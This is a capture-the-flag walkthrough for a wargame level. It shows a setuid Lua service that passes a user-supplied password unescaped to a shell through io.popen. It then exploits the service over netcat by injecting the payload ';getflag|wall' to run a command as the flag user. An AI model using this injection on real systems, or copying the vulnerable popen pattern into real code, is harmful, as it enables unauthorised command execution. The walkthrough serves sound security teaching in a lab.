# Level 11 instructions:

## Check home directory:
```
$ ls -l
total 4
-rwsr-sr-x 1 flag11 level11 668 Mar  5  2016 level11.lua
```

## See contents of script:
```
$ cat level11.lua
#!/usr/bin/env lua
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 5151))

function hash(pass)
  prog = io.popen("echo "..pass.." | sha1sum", "r")
  data = prog:read("*all")
  prog:close()

  data = string.sub(data, 1, 40)

  return data
end


while 1 do
  local client = server:accept()
  client:send("Password: ")
  client:settimeout(60)
  local l, err = client:receive()
  if not err then
      print("trying " .. l)
      local h = hash(l)

      if h ~= "f05d1d066fb246efe0c6f7d095f909a7a0cf34a0" then
          client:send("Erf nope..\n");
      else
          client:send("Gz you dumb*\n")
      end

  end

  client:close()
end
```

It uses the shell to validate your password. This is insecure and we can exploit it.

## Try run the script:
```
$ ./level11.lua
lua: ./level11.lua:3: address already in use
stack traceback:
	[C]: in function 'assert'
	./level11.lua:3: in main chunk
	[C]: ?$ ./level11.lua
lua: ./level11.lua:3: address already in use
stack traceback:
	[C]: in function 'assert'
	./level11.lua:3: in main chunk
	[C]: ?
```

It can't open the port it listens on which means the script is probably already running. Let's just try connect to the port and exploit the script.

## Connect to port and exploit acript.
```
$ nc localhost 5151
Password: ;getflag|wall

Broadcast Message from flag11@Snow
        (somewhere) at 18:09 ...

Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s

Erf nope..
``` 
